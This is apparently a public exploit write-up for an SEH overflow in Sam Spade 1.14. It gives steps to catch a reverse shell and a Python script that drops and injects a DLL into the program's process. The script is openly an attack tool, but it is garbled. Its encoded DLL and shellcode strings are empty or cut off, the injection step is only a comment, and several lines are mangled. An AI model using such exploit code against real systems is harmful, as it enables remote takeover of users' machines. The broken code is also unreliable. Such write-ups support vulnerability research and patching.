Exploit Title: Sam Spade 1.14 - SEH Overflow via Arbitrary DLL Injection
Discovered by: Ahmet Ümit BAYRAM
Discovered Date: 14.03.2024
Vendor Homepage: https://www.majorgeeks.com/files/details/sam_spade.html
Software Link: https://www.majorgeeks.com/files/details/sam_spade.html
Tested Version: 1.14
Tested on: Windows 10 32bit
Steps to Reproduce
- Set up a listener to catch the reverse shell.
- Open Sam Spade.
- Run the exploit script (
exploit.py) in the directory where Sam Spade is installed. - Open the generated
payload.txtfile and copy its contents. - Go to Tools > Scan Addresses.
- Paste the copied payload into the “Scan From IP Address” box and click OK.
- Your reverse shell should now be active, connecting to your listener.
Exploit Code
The following Python script generates a payload and injects a DLL to exploit the SEH Overflow vulnerability in Sam Spade.
```python import sys import struct from base64 import b64decode from time import sleep import ctypes from ctypes import byref, c_int, c_ulong, create_string_buffer
def dropping_dll():
# Dropping DLL on disk
sleep(2)
print(“[+] Dropping arbitrary .dll on disk”)
sleep(2)
b64_dll = “
dll_injection(PID)
def dll_injection(PID): # Attempting DLL injection print(“[+] Initiating DLL injection phase”) sleep(2) dll_name = “payload.dll” dll_path = create_string_buffer(dll_name.encode(‘utf-8’))
hProcess = ctypes.windll.kernel32.OpenProcess(0x001F0FFF, False, int(PID))
if not hProcess:
print("[-] Could not obtain process handle.")
return False
# Memory allocation and injection steps...
print("[+] DLL injected successfully.")
ctypes.windll.kernel32.CloseHandle(hProcess)
generate_payload()
def generate_payload():
print(“[+] Generating payload…”)
shellcode = b”
def main():
global PID
if len(sys.argv) > 1:
PID = sys.argv[1]
print(“Sam Spade 1.14 SEH Overflow via Arbitrary DLL Injection”)
print(“[+] Selected PID is {}”.format(PID))
dropping_dll()
else:
print(“Usage: python {}
if name == “main”: main()